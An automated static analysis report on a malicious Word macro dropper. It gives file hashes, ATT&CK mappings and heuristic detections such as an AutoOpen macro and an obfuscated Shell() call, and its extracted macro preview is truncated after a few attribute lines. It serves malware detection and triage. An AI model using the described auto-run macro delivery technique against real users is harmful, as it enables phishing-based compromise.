Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5ac2894d3aa59225…

MALICIOUS

Office (OLE)

Size: 199.4 KB
First seen: 2018-01-23
MD5: 021cf37651dee4f690a971faa547fff2
SHA-1: 8b2cce665df32c0a8fb1dc996a448e63adbf1444
SHA-256: 5ac2894d3aa5922529533fa1d87a0a261851cc88ff8e55c361acbd7ef89a4ecd
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file contains VBA macros, including an AutoOpen macro and a Shell() call, which together indicate malicious intent. ClamAV detection classifies it as a dropper/phishing lure. The VBA code is obfuscated and most likely downloads and executes a second-stage payload, consistent with macro-based malware delivery.

Heuristics 5

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 80336 bytes
SHA-256: 7e77356e2e915cf67af740ec088aa3d2c8015915d21f227dcc4d17cb3048c307
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SNTwjEnGXRiTn"
... (truncated)